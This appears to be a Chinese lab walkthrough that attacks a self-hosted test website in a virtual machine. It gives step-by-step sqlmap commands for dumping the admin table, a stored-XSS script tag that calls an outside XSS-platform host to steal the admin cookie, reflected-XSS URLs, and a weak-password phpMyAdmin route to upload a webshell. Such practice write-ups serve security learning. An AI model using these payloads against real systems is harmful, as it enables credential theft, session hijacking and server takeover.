開門見山
在虛擬機中搭建網站,本機訪問http://192.168.31.68/

一、SQL注入獲取管理員賬號密碼
1. 點開一篇文章,存在get請求參數

2. 手工注入無果,使用sqlmap,后跟-p接指定參數,驗證是否存在sql注入
sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid"


3. 爆數據庫
sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" --dbs



4. 爆表
sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test --tables



5. 爆字段
sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage --columns



6. 爆值
sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage -C user,password --dump


7. MD5解密63a9f0ea7bb98050796b649e85481845 為 root
得到管理員的賬號密碼 admin /root
可以進一步登進后台操作
二、存儲型XSS獲取管理員cookie
1. 在xss平台上配置監聽端口


2. 復制代碼,<sCRiPt sRC=http://xss.fbisb.com/tHbs></sCrIpT>

3. 在表單中插入xss腳本

4. 發表成功,等待管理員登錄后台查看留言,


5. 監聽段得到服務端反彈過來的信息,得到管理員的cookie

6. 找到網站后台,登錄抓包

把cookie替換陳管理員的cookie,並且記得要換上面的目標網址把login.php換成index.php,需要改多個包,發包進入后台

三、反彈型xss
http://192.168.31.68/?r=content&cid=5' <img src=1 onerror=alert(/xss/)>

http://192.168.31.68/?r=list&class=3&page=1'<img src=1 onerror=alert(/xss/)>

四、Phpmyadmin弱口令上傳一句話
賬號密碼為root/root
進去執行SQL上傳文件語句
有phpinfo.php知道絕對路徑


菜刀連接


